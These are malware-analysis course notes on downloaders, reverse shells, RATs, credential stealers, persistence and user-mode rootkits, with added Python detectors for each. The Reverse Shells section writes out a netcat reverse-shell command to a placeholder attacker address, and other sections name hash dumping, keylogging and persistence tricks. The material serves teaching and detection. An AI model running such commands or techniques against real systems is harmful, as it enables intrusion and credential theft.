Chapter 12 Notes
to accompany Sikorski and Honig, Practical Malware Analysis, No Starch Press.
In the printed book this is Chapter 11.
Malware Behavior
A whirlwind tour of malware functionality
Downloaders and Launchers
- Downloaders get a file from the Internet, presumably malware, and run it.
- Use API call URLDownloadToFileA, followed by a call to WinExec
- A "launcher" (or "loader") installs malware, for immediate or future execution.
- The launcher may have the malcode encoded inside it
- The launcher may be a script, not an executable binary in its own right
Backdoors
- Provides an attacker with remote access
- Common, and lots of variety
- many take advantage of holes in the Remote Desktop Protocol (RDP)
- A backdoor will often use HTTP to communicate with its masters
- Functionality may include registry manipulation, creating windows, file system operations, etc.
Reverse Shells
- A form of backdoor, which gives attacker a shell
- Using netcat: attacker will run nc -l -p 80 to listen for incoming connections
- Victim will be made to run nc atta.cker.ip.addr 80 -e cmd.exe, causing a shell to run on the victim machine with I/O over the socket.
- Windows Reverse Shells can be basic, or multi-threaded.
- Basic: call CreateProcess with certain STARTUPINFO as input argument, window suppressed
- Multi-threaded: two pipes and two threads, allowing information sent over STDIN or STDOUT to be encoded
- So CreateThread and CreatePipe are indicators.
- Might be easier (or harder?) to notice the traffic using Wireshark
- did we demonstrate Wireshark?
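An added example (mine, not from the book or these notes) of what "noticing the traffic" could mean once Wireshark has shown it: a heuristic that flags a cmd.exe session riding on a port that should be carrying HTTP, which is how the nc ... 80 -e cmd.exe shell above looks on the wire. The packets, addresses and the cmd.exe banner text are all constructed.

```python
import re

# Added example (not from the book or these notes): flag a Windows command
# shell riding over a port normally used for HTTP, which is how the netcat
# reverse shell described above would appear in a packet capture.
# The "packets" below are constructed, not captured traffic.

WEB_PORTS = {80, 8080}
HTTP_PREFIXES = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"HTTP/1.")

# Text a cmd.exe session emits when it starts, plus a drive-letter prompt at
# the start of a line. These markers are assumptions about typical output.
SHELL_PATTERNS = [
    re.compile(rb"Microsoft Windows \[Version"),
    re.compile(rb"\(C\) Copyright \d{4}", re.IGNORECASE),
    re.compile(rb"(?m)^[A-Za-z]:\\[^\r\n]*>"),
]

def looks_like_http(payload: bytes) -> bool:
    return payload.lstrip().startswith(HTTP_PREFIXES)

def looks_like_cmd_shell(payload: bytes) -> bool:
    return any(p.search(payload) for p in SHELL_PATTERNS)

def find_suspicious_flows(packets):
    """Return flow tuples (src, sport, dst, dport) whose payload on a web port
    is not HTTP but does look like a Windows command shell."""
    flagged = []
    for pkt in packets:
        if pkt["dport"] not in WEB_PORTS:
            continue
        payload = pkt["payload"]
        if looks_like_http(payload) or not looks_like_cmd_shell(payload):
            continue
        flow = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        if flow not in flagged:
            flagged.append(flow)
    return flagged

SAMPLE_PACKETS = [  # constructed: one normal web request, one shell, one TLS hello
    {"src": "10.0.0.5", "sport": 49152, "dst": "198.51.100.7", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"},
    {"src": "10.0.0.5", "sport": 49153, "dst": "198.51.100.7", "dport": 80,
     "payload": (b"Microsoft Windows [Version 5.1.2600]\r\n"
                 b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\n"
                 b"C:\\Documents and Settings\\user>")},
    {"src": "10.0.0.5", "sport": 49154, "dst": "198.51.100.9", "dport": 443,
     "payload": b"\x16\x03\x01\x00\xc5\x01\x00\x00\xc1\x03\x03"},
]

if __name__ == "__main__":
    for flow in find_suspicious_flows(SAMPLE_PACKETS):
        print("possible reverse shell:", flow)
```

The victim side of the shell is the one that connects out, so the banner shows up in the victim-to-attacker direction on the attacker's listening port; that is why the check keys on the destination port.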
RATs
- RAT = Remote Administration Tool
- not malicious per se, since sysadmins need such a utility to, for example, apply patches to a lab full of PCs
- Servers are installed on compromised victim machines.
- They make contact with the RAT client, which then tells them what to do
- "Poison Ivy is a freely available and popular RAT..."
- doesn't seem to be available at the old web site, but I found a copy here
- and was able to install it, generate a malware specimen, and VirusTotal went nuts!
- demonstrate use of Poison Ivy to build and run malware
- the OVA file for my Windows XP machine. (UMBC only) About 2.4 GB in size.
Botnets
- Botnets employ sets of compromised hosts (zombies)
- RATs work on a more individual level than Botnets
- Botnets usually tell all the zombies to do the same thing, e.g. mass vs. targeted attacks
- There's a literature on Botnets,
Credential Stealers
- Graphical Identification and Authentication (GINA) allows the use of RFID and smart cards for logon security, which is good, except when malware authors get involved
- The registry has a key that tells where customized GINA DLLs can be found
- So winlogon.exe will load those DLLs, and then load the default msgina.dll
- So a DLL exporting many functions whose names begin with Wlx is suspicious
- Pass the Hash!
- Windows hashes are a good source of system credentials, and utilities such as PWdump and Pass-the-Hash are available.
- Hash dumping tools often use the Local Security Authority Subsystem Service, lsass.exe, for their activities
- Keystroke logging!
- kernel-based keyloggers can act as keyboard drivers, bypassing normal protections.
- user-space keyloggers can use hooking or polling
- "Hooking uses the Windows API to notify the malware each time a key is pressed, typically with the SetWindowsHookEx function. Polling uses the Windows API to constantly poll the state of the keys, typically using the GetAsyncKeyState and GetForegroundWindow functions."
- strings such as [Num Lock] in strings listings are suspicious
Persistence Mechanisms
- We've talked about this a lot!
- Malware can hide in the Registry, e.g. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- The Autoruns tool helps find such items
- ProcMon tells us of changes to the Registry
- "AppInit_DLLs are loaded into every process that loads User32.dll, and a simple insertion into the registry will make AppInit_DLLs persistent."
- Winlogon Notify and svchost are other popular places to hide
- Trojanizing system binaries: malware modifies system software, such as popular DLLs, to do its dirty work.
- Checking MD5 hashes will help discover such trojanized binaries, and IDA can be used to see what's going on
- DLL-load order hijacking: place malicious files in directories, according to the loader's search path, so that malware is loaded instead of legitimate code (this trick is as old as the hills)
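An added example (mine, not from the book or these notes) for the last two bullets: an MD5 baseline comparison that catches a trojanized binary, and a simulation of the loader's DLL search order that shows why a same-named DLL placed beside the EXE wins. The file contents and paths are constructed, and the search order is the usual SafeDllSearchMode sequence, which is an assumption on my part rather than something the notes state.

```python
import hashlib

# Added example (not from the book or these notes). Two checks for the last two
# persistence tricks above: (1) a baseline-hash comparison that catches a
# trojanized system binary, and (2) a simulation of the loader's DLL search
# order that shows why a same-named DLL in the application directory wins.
# File contents, paths and the search order here are constructed; the order
# follows the usual SafeDllSearchMode sequence (assumed, not from the notes).

def fingerprint(files: dict) -> dict:
    """path -> MD5 hex digest, the kind of baseline one takes from a clean build."""
    return {path: hashlib.md5(data).hexdigest() for path, data in files.items()}

def check_against_baseline(files: dict, baseline: dict) -> list:
    """Paths whose current hash differs from the baseline, or that the baseline
    does not know about at all. Each of these deserves a look in IDA."""
    current = fingerprint(files)
    return sorted(p for p, h in current.items() if baseline.get(p) != h)

def dll_search_order(app_dir, cwd, path_dirs, windows_dir=r"C:\Windows"):
    # Simplified default order with SafeDllSearchMode on (assumption).
    return [app_dir,
            windows_dir + r"\System32",
            windows_dir + r"\System",
            windows_dir,
            cwd,
            *path_dirs]

def resolve_dll(name: str, order: list, filesystem: set):
    """First directory in the search order that contains `name`, or None."""
    for d in order:
        candidate = (d + "\\" + name).lower()
        if candidate in filesystem:
            return candidate
    return None

def hijack_candidates(dll_names, expected_dir, order, filesystem) -> list:
    """DLLs that resolve somewhere other than the directory they belong in."""
    out = []
    for name in dll_names:
        found = resolve_dll(name, order, filesystem)
        if found and not found.startswith(expected_dir.lower() + "\\"):
            out.append((name, found))
    return out

GOOD_FILES = {  # constructed contents standing in for real binaries
    r"c:\windows\system32\helper.dll": b"MZ\x90\x00good-helper",
    r"c:\windows\system32\other.dll":  b"MZ\x90\x00good-other",
}
BASELINE = fingerprint(GOOD_FILES)
ON_DISK = dict(GOOD_FILES)
ON_DISK[r"c:\windows\system32\helper.dll"] = b"MZ\x90\x00good-helper\x00patched"

FILESYSTEM = {  # constructed: every file path on the box, lower-cased
    r"c:\windows\system32\helper.dll",
    r"c:\windows\system32\other.dll",
    r"c:\program files\app\app.exe",
    r"c:\program files\app\helper.dll",   # same name, dropped beside the EXE
}
ORDER = dll_search_order(r"C:\Program Files\App", r"C:\Users\me", [r"C:\Tools"])

if __name__ == "__main__":
    print("changed since baseline:", check_against_baseline(ON_DISK, BASELINE))
    print("search-order hijacks:",
          hijack_candidates(["helper.dll", "other.dll"], r"C:\Windows\System32",
                            ORDER, FILESYSTEM))
```

The hash check only works if the baseline was taken from a known-clean system; the search-order check only tells you which copy would load, so the flagged file still has to be hashed or opened in IDA to see whether it is actually malicious.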
Privilege Escalation
- Metasploit "Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments."
- Windows API calls exist to adjust a process's privileges, so code that uses these calls is suspect
- "It’s typically not necessary to analyze the intricate details of the escalation method that malware uses." Maybe so, but new ways of doing this are precioussssss
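An added example (mine, not from the book or these notes) that turns the API indicators named in the Downloaders, Reverse Shells, Credential Stealers and Privilege Escalation sections into a static triage rule set. A real tool would pull imports, exports and strings out of the PE with a parser such as pefile; here each sample is a constructed summary. Two assumptions go beyond the notes: AdjustTokenPrivileges is taken as the "adjust a process's privileges" call, and socket imports (WSAStartup, connect) are added to the basic reverse-shell rule because CreateProcess alone is far too common to be an indicator.

```python
# Added example (not from the book or these notes): a static-triage rule set
# keyed on the API names this chapter associates with each behaviour.
# Assumptions beyond the notes: AdjustTokenPrivileges stands in for "adjust a
# process's privileges"; WSAStartup/connect are added to the basic reverse
# shell rule; the extra keylogger strings beyond [Num Lock] are my guesses.

RULES = [  # (label, set of imports that must all be present)
    ("downloader (URLDownloadToFile + WinExec)", {"URLDownloadToFile", "WinExec"}),
    ("reverse shell, basic (CreateProcess + socket)", {"CreateProcess", "WSAStartup", "connect"}),
    ("reverse shell, multi-threaded (pipes + threads)", {"CreateProcess", "CreateThread", "CreatePipe"}),
    ("keylogger, hooking (SetWindowsHookEx)", {"SetWindowsHookEx"}),
    ("keylogger, polling (GetAsyncKeyState + GetForegroundWindow)", {"GetAsyncKeyState", "GetForegroundWindow"}),
    ("privilege adjustment (AdjustTokenPrivileges)", {"AdjustTokenPrivileges"}),
]
KEYLOG_STRINGS = {"[Num Lock]", "[Caps Lock]", "[ENTER]", "[BACKSPACE]"}
GINA_EXPORT_MIN = 3  # number of Wlx* exports before we call it a GINA DLL

def canonical(name: str) -> str:
    """Fold the ANSI/Unicode suffix so CreateProcessA and CreateProcessW both
    match the generic name used in the notes. Only a trailing upper-case A/W
    after a lower-case letter is stripped (GetForegroundWindow stays intact)."""
    if len(name) > 2 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name

def triage(sample: dict) -> list:
    """Labels for every rule the sample satisfies, in RULES order, followed by
    the GINA export check and the keylogger string check."""
    imports = {canonical(n) for n in sample.get("imports", [])}
    exports = sample.get("exports", [])
    strings = set(sample.get("strings", []))
    hits = [label for label, needed in RULES if needed <= imports]
    wlx = [e for e in exports if e.startswith("Wlx")]
    if len(wlx) >= GINA_EXPORT_MIN:
        hits.append("GINA replacement (%d Wlx* exports)" % len(wlx))
    found = strings & KEYLOG_STRINGS
    if found:
        hits.append("keylogger strings (%s)" % ", ".join(sorted(found)))
    return hits

SAMPLES = {  # constructed summaries, not real specimens
    "dropper.exe": {"imports": ["URLDownloadToFileA", "WinExec", "ExitProcess"]},
    "rshell.exe": {"imports": ["WSAStartup", "WSASocketA", "connect",
                               "CreateProcessA", "CreateThread", "CreatePipe"]},
    "gina_hook.dll": {"imports": ["GetAsyncKeyState", "GetForegroundWindow", "WriteFile"],
                      "exports": ["WlxNegotiate", "WlxInitialize",
                                  "WlxLoggedOutSAS", "WlxActivateUserShell"],
                      "strings": ["[Num Lock]", "[ENTER]", "msgina.dll"]},
    "clean.exe": {"imports": ["CreateFileA", "WriteFile", "ExitProcess"]},
}

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, "->", triage(sample) or ["nothing matched"])
```

These are leads, not verdicts: a legitimate installer imports URLDownloadToFile and WinExec too, so each hit is a reason to open the sample in IDA and look at what happens around the call.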
User-mode Rootkits
- Rootkits are supposed to hide malicious activity
- Books are devoted to this topic
- IAT Hooking modifies the Import Address Table or the Export Address Table, so that malware is executed instead of legitimate system code
- Easy to detect, for example, by setting breakpoints on the IAT and EAT (?)
- Inline Hooking overwrites legit DLL code
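An added example (mine, not from the book or these notes) of what the two detections would check: an IAT slot that no longer points into the DLL that exports the function, and a function whose first bytes have been replaced by a jump out of its own module. The module map, IAT entries, function address and code bytes are all constructed for a 32-bit process; the hot-patchable prologue bytes are the standard mov edi,edi / push ebp / mov ebp,esp sequence.

```python
import struct

# Added example (not from the book or these notes): two detection checks for
# the user-mode hooks described above, run over a constructed snapshot of a
# 32-bit process. Module bases, IAT entries and code bytes are all made up.

MODULES = {  # name -> (base, size)
    "kernel32.dll": (0x7C800000, 0x000F6000),
    "user32.dll":   (0x7E410000, 0x00091000),
    "unknown.dll":  (0x10000000, 0x00010000),   # stands in for an injected module
}

def owner_of(addr: int, modules: dict):
    """Name of the module whose image range contains addr, or None."""
    for name, (base, size) in modules.items():
        if base <= addr < base + size:
            return name
    return None

# (DLL the import comes from, function name, address currently in the IAT slot)
IAT = [
    ("kernel32.dll", "CreateFileA", 0x7C801A28),
    ("kernel32.dll", "WriteFile",   0x10001234),   # slot now points elsewhere
    ("user32.dll",   "MessageBoxA", 0x7E4507EA),
]

def find_iat_hooks(iat, modules) -> list:
    """An IAT slot should hold an address inside the DLL that exports the
    function; anything else is a hooked (or unresolved) entry.
    The same range check applies to an Export Address Table."""
    hooks = []
    for dll, func, addr in iat:
        actual = owner_of(addr, modules)
        if actual != dll:
            hooks.append((func, dll, actual))
    return hooks

# Standard hot-patchable x86 prologue: mov edi,edi / push ebp / mov ebp,esp
CLEAN_PROLOGUE = bytes.fromhex("8BFF558BEC")

def inline_hook_target(func_addr: int, code: bytes):
    """If the function starts with a jmp rel32 (opcode E9), return where it
    lands; otherwise None. Inline hooks commonly overwrite the first 5 bytes."""
    if len(code) >= 5 and code[0] == 0xE9:
        rel, = struct.unpack_from("<i", code, 1)
        return (func_addr + 5 + rel) & 0xFFFFFFFF
    return None

def check_inline_hook(func_addr: int, code: bytes, modules: dict):
    """(hooked?, module owning the jump target) for a function's first bytes."""
    target = inline_hook_target(func_addr, code)
    if target is None:
        return False, None
    return True, owner_of(target, modules)

# Constructed code bytes for a kernel32 export, clean and then patched
WRITEFILE_ADDR = 0x7C810000
CLEAN_CODE = CLEAN_PROLOGUE + b"\x83\xEC\x10"          # ... sub esp,10h
HOOK_TARGET = 0x10005000
HOOKED_CODE = (b"\xE9" + struct.pack("<i", HOOK_TARGET - (WRITEFILE_ADDR + 5))
               + b"\x90\x90\x90")

if __name__ == "__main__":
    print("IAT entries pointing outside their DLL:", find_iat_hooks(IAT, MODULES))
    print("WriteFile clean:", check_inline_hook(WRITEFILE_ADDR, CLEAN_CODE, MODULES))
    print("WriteFile patched:", check_inline_hook(WRITEFILE_ADDR, HOOKED_CODE, MODULES))
```

A jump that lands inside the same DLL can be a legitimate hot patch, so the interesting case is a target that resolves to a module nobody expected to be loaded, or to no module at all.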